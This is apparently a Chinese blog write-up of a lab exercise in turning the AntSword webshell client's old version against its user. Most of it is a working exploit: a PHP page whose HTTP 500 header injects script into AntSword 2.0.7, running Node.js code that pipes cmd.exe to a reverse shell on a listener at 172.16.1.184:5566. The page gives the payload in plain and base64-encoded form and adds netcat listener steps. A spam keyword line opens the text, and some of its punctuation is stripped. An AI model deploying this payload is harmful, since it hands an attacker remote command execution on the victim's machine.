wordpress建设资源站点插件,用户体验设计专业,线上营销推广方案模板,建设移动门户蚁剑低版本反制
漏洞概述 中国蚁剑是一款开源的跨平台网站管理工具#xff0c;它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。影响范围
AntSword 2.0.7
蚁剑实验版本#xff1a;2.0.7
环境搭建#xff1a;
172.16.1.233#xff08;蓝队服…蚁剑低版本反制
漏洞概述 中国蚁剑是一款开源的跨平台网站管理工具它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。影响范围
AntSword 2.0.7
蚁剑实验版本2.0.7
环境搭建
172.16.1.233蓝队服务器kali
172.16.1.235红队win10
172.16.1.184蓝队反制(win10)
反制过程
漏洞
?php
header(HTTP/1.1 500 img src# onerroralert(1));利用
在 Node.js 中提供了一个 net.Socket 对象用于方便调用底层 Socket 接口实现数据传输的功能。net.Socket 既可以读也可以写这个 client 建立 socket 链接实现了将对方 cmd.exe 的标准输入输出与标准错误流转发到受害者自己的 ip:5566端口上。
var net require(net), sh require(child_process).exec(cmd.exe); var client new net.Socket(); client.connect(5566, 172.16.1.184, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);})将上面 base64 编码完成的内容放进 Buffer 函数中
组合后payload
编码前
?php
header(HTTP/1.1 500 Not img src# οnerrοreval(new Buffer(var net require(net), sh require(child_process).exec(cmd.exe); var client new net.Socket(); client.connect(5566, 172.16.1.184, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});,base64).toString()))完整payload
?php
header(HTTP/1.1 500 Not img src# οnerrοreval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCg1NTY2LCAiMTcyLjE2LjEuMTg0IiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pOw,base64).toString()));将红队的木马替换成我们的反制木马
蓝队服务器我用的kali
开启apache服务命令 service apache2 start 172.16.1.184蓝队反制NC开启监听 172.16.1.235红队使用蚁剑连接 172.16.1.184蓝队反制接到红队shell 蚁剑和nc下载
链接https://pan.baidu.com/s/1OBWFSPz38pUpnKMz09FUyQ
提取码joyb
